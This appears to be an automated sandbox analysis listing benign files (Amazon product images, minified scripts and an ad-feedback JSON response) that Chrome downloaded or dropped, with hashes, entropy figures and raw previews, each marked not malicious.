                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR................Z....gAMA......a.....sRGB.........PLTE....j..j.....i....fJ.nU.....i.....j..j............._bg[ajD`e.k..j..i.. ..i....\..i."'+.j.......j....................i.&+1otzMT[.i..........NSZbgl.i.jpw..E.... ...HOW.....j....bde...KQY........OTS344^ch....j.........adh............2.....eefZ`f.j.......{..{..ejr..........s.........i...biq`fnOSY....................fff.....f...........w.!!!fff...bhp.u..u..Y.'..PUY.....488.u.588.H.........F..............c.../.....tz.............1.................J.!!!..c.l.......q.m..v;d..D..Vx..../8A......#*1/8@.....\333...`gofffPW`.....%......KR[]dl.u.dkr.....dT[dX_g............kqx................7>A.].......Y..<........+4>.j..................}..UUU......?GP.{.............uK....7.'..rx~..R../~.....y.s.....%....W.........t...Y.{{I...YY...........tRNS.A4............b.H..[eo6..'..Q.......Q....a.w...`....w.a.A.5...q/.{I...e..X.^.......p....q..~......R.w...6........Gc........|......Z......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 85x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2581
                                                                                                                                                                                                                                                                      Entropy (8bit):7.814188670450567
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rRpiz2bSQw4h/na0v06lbBbqNxtcii7APHHzmW:Te9bSIvl3hgft+6HHiW
                                                                                                                                                                                                                                                                      MD5:90DAD5DA5BC980E5AD4AB85170E846B0
                                                                                                                                                                                                                                                                      SHA1:928AA23533207A475314ECA14EF8C840721DCE8E
                                                                                                                                                                                                                                                                      SHA-256:600C212D087759FBC4714915517D268A45F84CAA974E9F059A3030E07F63DE37
                                                                                                                                                                                                                                                                      SHA-512:0E159BA97AA59D2F784889FA83EEB34F71E6C5B07E1CDEDBEBA05ED550BA9E6B1088B884EF0002DD2440A91E1B688BDCADCE54DA467EB1AB96A83BFEC2E73F95
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........U.."............................................................!.1A."Qaq.......2.BRr.....#b..3C................................................!1..............?......Y..>.J.x.......?....i..T^.I....l.". ...O^......4.,.nS!..wW...gnqA/.h..5.-...............0........n...>&.:.L...{L.K.'.O.|...K........J7e..w/..y.f...O.p.lH.u.}nb\k..P.7....f....=+\t........n..O9..1.6rE...a..."....uj..L1..b..:\......"._..)...q.qp...+.5.e..Q...kWg...b.t...t.3...n7.b_.. ....Y..M....Rw.p........f<"}V...a.@A")H.L<.h....W....../.j!o.+.c.1.......6T...].9..8r6U,YB.X....A..<..\.8....5...YE.Y:.L4....|.z\(..s....A*Hn....u..7.%..x|x.;.c\..o_..!...pys.#*.-..n...@]D..6..:. ...M..7b.3.v-Fa..k..tb..A ..n.P.@*..)....{|...hj.<.....{..4{A;^..$.tx..Po.H..^..2..dhU..o>.w.......-.......G..sD.UR...Y..U......s.. R5.......3.....7...d.l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3967)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):155635
                                                                                                                                                                                                                                                                      Entropy (8bit):5.6012297023192055
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:jB2IgihRBtHxItbMtEKLiG9f1xmR4RpKxYGzVRMqBY7lBfXW5LrSgaxIGVRo6Fu+:jB2IgURBtHxItbMtEKLiG9NQR4RpKxj0
                                                                                                                                                                                                                                                                      MD5:D1F1B11C5CF6EA65875017C9DA1228B3
                                                                                                                                                                                                                                                                      SHA1:C906475C65D8168DBE04CC21F861660DFA753642
                                                                                                                                                                                                                                                                      SHA-256:78ECEBC3ED6F2C0892356AC05F72CB259EB3BA56ABCE9B0BC0918CB392615A10
                                                                                                                                                                                                                                                                      SHA-512:C81F59425947034FA1641004EC6D0B55983567B32D6AB70EA01E32ED1BF09E04363F4BDAA6E4EABC2675202F70664644E8F4FEEA505E719050BA4E501323681F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"$"
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.133068273485651
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNI4zHJcrr09EbtreSDOlHh9rLl7y0uqYD40STfKAHSTfXAk4HeAPpU:IQ4zpcX09EY+wHh9rx7yAk4fKAAXAk4o
                                                                                                                                                                                                                                                                      MD5:8AEE26520CCD440CFBBF934F7EE5E7FF
                                                                                                                                                                                                                                                                      SHA1:5BA4DDC1D6D4531280807B16DDBC30E58ABDE7C9
                                                                                                                                                                                                                                                                      SHA-256:069E08B1664D9A1BB369CAF287539A0F48B987D4C1039C5E6D4076DA243E5B85
                                                                                                                                                                                                                                                                      SHA-512:44635582B6362AD2203472EC10F839FCD17DB32098ACE3DEEF1F898C82362F7BC323C3C100CD052A2E634FFFF1635FA9C1D312FF818335D7C30F05E905D3A43E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-2&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px; display: inline-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):39825
                                                                                                                                                                                                                                                                      Entropy (8bit):7.980772664391927
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:18tw6prOeE12zX/kBuYZ2Wrca7SQ0+Wvku3EBCio9+IsPEUjpKuKXIHQsij+P6Te:qDaeE1G/kBZ2ZWyC0iW+hN9KuKA/vy0T
                                                                                                                                                                                                                                                                      MD5:45C547375A4CC58603E79FB078DDB2C5
                                                                                                                                                                                                                                                                      SHA1:D7A8570A036798F7AF45222D493059D6E2744219
                                                                                                                                                                                                                                                                      SHA-256:5E9F53D3DAD76109934B36426436ACB85023D469E76DBF45D1C9EB2B9641E91B
                                                                                                                                                                                                                                                                      SHA-512:CD60C6096B05EB170DF70EE801792C3CFFCD3D23D15111211F98DEF75105AB4E7BFF5443174030FF90F6CB1A23A0F6ECEE4A21D78EBF3829E2BAA576F647BE90
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................t7)J..L.h....R8.G6@u@V..|\P...46..x.@..I.....m.........L.v.f.....e.Z.Yq.+........?.+.$n(d.U.~+..ej...5z....A.......<....c.~.=u...F.v....W.rjL..;.F..:.=.<D<.Jm.._-...r..(............I....$..y[...l&n......?.Ifk.7zmVt...9......Y.D.x...E.k1..tbj.........9.p..b....=......RX]..2RL...C.4b..L].,........+t..7..}....~?5..%|...n.%....h._...P....gF.,.v.............b.CBK6y=.>....2\...A..LQ..4.3....N|.....^..O.z'.%.R{v\.......h..(0tg..y....l3.'.....A...I.y.v.3....Z]7.xo..j`p.....ug3......r!..xm...v...oSvG.Y..r.XlFE........a.&......$|q-.voY....}l/....x.X.n.v..x...s.46.3......w.-...=B..q..^./...+.g..I.s].&@.....Kw..~.(........?D$7.L.TT...3.m7u.>.%...J..?.."F..S.q.=1.0.1h..^.c..S...l.4.4..Z..>i.t.k...tf...!...Y...{'......l.g..."s.vM6.a..d.~W...=^mqE6.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16644
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911841068766657
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:8YIBUYqjRaFBkx7xOjVPmXnuW6iKWum4gSN:HIkxFO5UuW61WumXG
                                                                                                                                                                                                                                                                      MD5:FDC5BC4DF172DFF97B0DB088CB76A282
                                                                                                                                                                                                                                                                      SHA1:E1E4458E0A1CAC9B9BE587F328E07EE0923A2DF4
                                                                                                                                                                                                                                                                      SHA-256:02523B2AF944A73BA4E8DE3AA057937F474E2BDD2A08D0F1ED09E51A10CA6108
                                                                                                                                                                                                                                                                      SHA-512:79E3793890AFB7524F4CE91F46443C4BC0AC51945E7F40C9F8133D946552C6AFE216925C80007D269DBA0CE70C434038B019C1F9C985FE0BB5505B9B53C3D73B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41daFqDf-bL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4....................................................................................................................../..|..6.........h......m......r.>C.f..Y...,.?................J...`...P)....L....J.p..A.3!......xz.'.CP..r...............>.......%<HN.S....^N.+M*If.p....RCp.,.J.&E.k...................4^.G. G.D../.Z`..M).ZzS.J.R_.< .d$.&BM...... .5.q?ls.@............qp..%.\...^@.Y=&2?Q.[.....3.>V..3....%C6..b...]M../~...................5V......V.f..>..]>9<.M.M/....nYZ.6.N7...g.Sb.rt5.Z)...S.>Y'...(&J..H}..................}g:..q.oL/..?..^..G...I..._.h....|.o.q..%..[.*.GB....c.y..\..BD..E<..._.q..[..._..yY.1I..........{........h..O8........qy...=/i.=M.).Hu..}....|..rJo+.+....:......G.M+..I:....{KQ,..7;..................0.3.[C,.m[.o.<.....6=gs._r...M$....m.,.........u..W.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):68782
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976825743641747
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:rIZGY8i4nqkvDYubQwqNAUnF5CQLPqIPl9IAXkK4zwxZ62Y:rhuoXbYcdc3FbjqIt9F4zwj6F
                                                                                                                                                                                                                                                                      MD5:D4F855A97CE69E0B4359AB927EC28574
                                                                                                                                                                                                                                                                      SHA1:6FE0487FA6ADBCAEDF60DBFB8086C001C0292307
                                                                                                                                                                                                                                                                      SHA-256:19B9598112754CE0A2612686ABC08BA18981C528FC3189C6AAAB4087ADB855E6
                                                                                                                                                                                                                                                                      SHA-512:9E9775C21FBBD3F119569B94416DB3809CE68FB39726A514FE87560F7034EBECFE7019DBA6E920DAB8602F1022E65D77CD6F7B7570C62E5FA846A45E27FECA75
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;.................................................................................`..0...@.YoQ......q....|~./?.Z.~u.....d..w\................<9a...c.^..69....d.........Fj..(u.a...............o....vEhc.zN.........v.....LK.'.\i@...........m...@.!.............X.L...JYi.._.........k...y.+1............/.mw<}&.}.`c ......G...w...............9K.....)..7......."......H....@..........~..2'.p...<.........-.a.......5.....V.......|..;....c.W=.....e7#....4.....@.."..........3'u'...!..D..%6..........b.(.0'Tv....;E...<...~.....n......|...~.t..;.........&...9..64..1oqm%.............O.M"d...t.....L..<...}....d.......h.=.*..<...>....$..c~...+....{~#......=...8N.R......K...........!u..._!.~.x.......#&.0...O.q....j......<.?.]...^.....a........l..1.w...Kj./.L..WO).... <..............f>..oowX......".O...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (531)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1406
                                                                                                                                                                                                                                                                      Entropy (8bit):5.225394152309612
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:2T/sWFxVPIVq4pgY2Gq4pGBq4pA6ZfLZq2G97doVl6yeIIr5s66TU0ttoO:IFxu98BLPGRdoV8yeImf6TB9
                                                                                                                                                                                                                                                                      MD5:58F0FEDF5D8FC4BFA2E0841607D6EF40
                                                                                                                                                                                                                                                                      SHA1:CB25320DC51C8EC3E664057F39ACD4829D0FEBE2
                                                                                                                                                                                                                                                                      SHA-256:8D1569345AA7C0E58BE0571BA51676058515949F2BAE328D9D0A3304F73D8E31
                                                                                                                                                                                                                                                                      SHA-512:061CCDF6C8994CFD70BF137B6899C850AFBA8A9B78563FB069361D0A7C190650E42A17A3448DDFA179B32A0D7417F8D48F77B6E5DD7CB0A8CCC4E127F78B3227
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets
                                                                                                                                                                                                                                                                      Preview:(function(d){var c=window.AmazonUIPageJS||window.P,g=c._namespace||c.attributeErrors,a=g?g("OctopusBrowsePageAssets",""):c;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,c,g){d.when("jQuery","ready").execute("apb-browse-refinements-checkbox-handler",function(a){a(".apb-browse-refinements").delegate(".apb-browse-refinements-checkbox","click",function(d){var b=a(d.currentTarget).closest("a").attr("href");b&&"#"!==b&&(d.preventDefault(),c.location.href=b)})});."use strict";d.when("A","jQuery","ready").execute("s-filters-declarative-action",function(a,d){a.declarative("s-nav-ref-image-layout-hover","mouseenter mouseleave",function(b){var f=b&&b.data,e=d(":first-child",b&&b.$currentTarget),a=null,c=null;b=b||{};"mouseenter"===b.type?(a=f.hoverOffsetX,c=f.hoverOffsetY):"mouseleave"===b.type&&(a=f.offsetX,c=f.offsetY);null!==a&&e.css("background-position",[a,"px ",c,"px"].join(""))})});"use strict";d.when("A","GLUXWidget").execute(function(a,d){a.on("pa
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):15836
                                                                                                                                                                                                                                                                      Entropy (8bit):7.978033266449793
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:DLIymeTV3dHKy+Njd1wd+nBsHFIjv/NQPSYawJ5iDz+mK:rrxBK9Bgd+n04NQaqT0z+mK
                                                                                                                                                                                                                                                                      MD5:A4623DA9F533B7E5B306B92A74B3EED5
                                                                                                                                                                                                                                                                      SHA1:EF1427F1456C21FF906A066DB5F55A423F743B76
                                                                                                                                                                                                                                                                      SHA-256:78EFF95329687225A8A3BB861A52C2FFB5952DC89330CE25318531A5A8FB4252
                                                                                                                                                                                                                                                                      SHA-512:5A0C530C6115E8ADD987B3F4E2C3746F1C780521FE4997C3F72CF0D29462FF7338FC9E26EF013F97B443404E21923FA7C580070BB0A306C48AA925DB13F8D7D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."................................................................!1..A"2Qq..3ar.......#6Bbst..%5RTUcu......$4CD...e..S..................................................!1.A.2Qaq..3r....."4BR...$..#...5C.............?..=..7.o..WV.....R./U U2.x.....5k....U..s.S.?R..... P.0.._A...T.........n.v.j..4...j.Y...x.s..w.......7.;P.k.JU7=.qG.....A....<.|.A+.4!1!.+...u...8....V....);m..8...w..A.euI...P;..8...uy.H...Go...*.Q.7.....q...(2j.-..x..G.u.^Z...IP...@....M.H@.E.d'........'..?.7.=@/z..MJ....Q..w...3.?.n.v....)..?...n.r...+....u...m.'...G.7j.'..Gn..#L..8...i{...!...>....N....zM.........9...W.*...~1h_.6_l...!C;Z..C....5.b........?.\.CTc.|..T....KK....K+.8.B..U.4.W+..&.Z..[..../.z..E=(B..{.^..7..V...U..f...).......i.|;..).y...%...hI4Z..4!..+..r..P..D-.r..^.!O.j.....zT.....K...A....d..5.#A.......%}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 13 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):538
                                                                                                                                                                                                                                                                      Entropy (8bit):7.363900406422438
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7r/6TBLr8CzfiF2PuKoSpH/geL6Ou4zlWkqMlMQn9inLjj5N:i/6FLlzu8kSdg3GNqMlGr5N
                                                                                                                                                                                                                                                                      MD5:3920E1FFC5AB160D1D7F18D8D6303633
                                                                                                                                                                                                                                                                      SHA1:53390E776D482DB9E85814A752276F517523724C
                                                                                                                                                                                                                                                                      SHA-256:3F8C75CC2824A1CE825FF2623763046C497B7D06587C14A07FD775F7506BCDA5
                                                                                                                                                                                                                                                                      SHA-512:5F368C2EFCA94B7021CC693CE95C9A598EEAAFF83072E2D14FF6A6EFE272A07B9301536237EE263E398D87CBE1E72879D11CC6EB443211C99118FB88E85CF35C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...................pHYs.................tIME.......}.......bKGD..............IDAT8...n.0.E.V....J...@..........f&...'@.[.202..d...$*[:"..Vv..Z.z..N.....V.q6....P.X,.r.,;E.....L.S..#.c..y.=.'..h.).....!.....`.........BR....#.)PdP... ....4............:.f.Z.....4...A..<..y.....N.....,..\.!.L..v...1]...d...t....*i..5.A....(.......O,..E.o...RM.....h4..j.*..JU.\/t..j/P.$........z=...C..&y...z-.9b..*!B..(...=U...B.J..M..,!n..............!u...x+.u.B'....=...j..O..{.E.*~{...j...?......J.T....IEND.B`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28461
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969390778310123
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1pF4QJDl6YjOSiGzQvbc8pRWNXzX2oY8hy81MiEH6dsEnYwSSlu+AZEATm5DF54k:1H4yhzSzcXqoRYMYSlAF65aRy
                                                                                                                                                                                                                                                                      MD5:2F02F0F78F103B99CAB054F814D31ECA
                                                                                                                                                                                                                                                                      SHA1:5A684F4AF4C7AE133849EE0989703B792348811F
                                                                                                                                                                                                                                                                      SHA-256:C4EA18F0F1AC33B7CDAABAE3092D4E8534B4510F8E59ED401F38F69222A52B93
                                                                                                                                                                                                                                                                      SHA-512:78B0D9DDBE6E85BCA25BBCE4E60E0E3FED1418ACE1BF8E7046096D5950F184E7ED8EF359EFEB14ACF6C711655D2E00D51B9A317DE749B674D39BC6768EC303D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-Basketball-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................1.j5...O{..L..O.......t..j...bYwz>!....b ....~a.....x.s.^.&...mO5.%..I......./.y."+.....z..+..{.ko[kK.-I$...%....D.......Y~..|..O&........I...Y7o.1....@.....\........+.:?E.F.JY...../Fk3.........h..M.^...{..q.E...s..e.,s.^'.v.......9..5c.."k..z.5..<...0p?....Oj.Yd64,z&.;3v..s..kZ.3.J..k#......Dh...Ns...n..dU...R.'..3..........4.\.<../).Z...=.OF............>........!..^m....q....x..sa.=.>..g..:F..V..4.m..$.J....9..t^..q\.i...8.$#.._.A.u=...As..x..C..c..|....@A.}sJ.'....|..^.{.......;X.....*f.6?k.Bd{..@.A.Y.3.>3...+q<...c...Z.....t.p3b.z.j]..zo...r..N...;.<{...x^_*.cEdz..u...v..K...}D.z.F...kU.(..[.........bV....V..w........-..t.....s....._.{.e...p.z..........2.g$..6..Q..Q.G.W..nv.{..<.-.^:.k,..z....y.&m.n..#....E..^.?u...`ht.9i.{.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1779
                                                                                                                                                                                                                                                                      Entropy (8bit):7.618580132227298
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r9DMkaeL1Vq0E92zVboguooxh8V/uOx4:TCOeLvrmUlobT4oOx4
                                                                                                                                                                                                                                                                      MD5:E1EBCF5EDB7C9FF71CF0E58D8A040BD3
                                                                                                                                                                                                                                                                      SHA1:F811F86A245395ADB8C9A6604E38BF8587E37659
                                                                                                                                                                                                                                                                      SHA-256:AE90D8D0286FBE0A5D5A8720EA72798EEADB8C9F2101C197FB2601890CC1B261
                                                                                                                                                                                                                                                                      SHA-512:0C492DC805C2C984ED4F146C28F3E8E4347DB7BCC7B7F50C6FDFEF27574EAB8848E304C56537C22B88213B8EAF68E36DE8434875527282EE35751B15F115202C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........{......................................................!1Qq.A.."Ra....2..#$3Br..........................................!1............?...............*"..I.x.8.K...d..5..t....[.<'.o=...4&.....o...c.t......',...um.SA..K.~..7d..~.!0..................+..v......_.=Nc....p..`.m \.}.......8......N....cT...4.x..2O...^.vL.Dq\..............6.-.w.Z.m\$@\.<.......M\i..~X...<..p!L.S..-u...F...k. Z8".j.p{Z..sZGg...t%..,6z..,..E.............!A.j.k._I..TCp|...ej..,v....{.......Z5s>..I$9vIq....~.X........k......#.1Mr.n.4..4.!x....g...z1e.#..a..b...............!.w.QM...~I..[+..b.:B..k.j_.X.1t...U....................;=-.85s..t.|.^Z..........WP...'.#.Ygnz...v.ig.....K8..K.V..qi....x.........>..am.....k@..@7...Y......+.11...&W...4.}.\u..T.4t]..........Dm.=Ja...-{G.g..ky....9.f^....8.3t....2N;..V...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):35596
                                                                                                                                                                                                                                                                      Entropy (8bit):7.941288835371088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:pzRXfAa+m5dHEbmLPtOf3MQ7MR+zBaFFFF6hP/pVtY:pNI/wd6mrgpQRY/rtY
                                                                                                                                                                                                                                                                      MD5:17452E64B4503CFDFE0A4D5652794CD0
                                                                                                                                                                                                                                                                      SHA1:62993F6159E6CCD43FF86D3089DCA01BF80551E2
                                                                                                                                                                                                                                                                      SHA-256:B7C4C7120BC386D2984CBB1B59257B7150108506C327DBCE5EF0110098A2154E
                                                                                                                                                                                                                                                                      SHA-512:834CB3C65302314673E6E125C5EC3BAFC79B31636A318B5F8C42CBE634D58A7E5379735A66588D726F46555C4176DCF0276DD18B12EC3ABA5786062629B857DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Petproducts_400x400_EN._CB567012733_.jpg
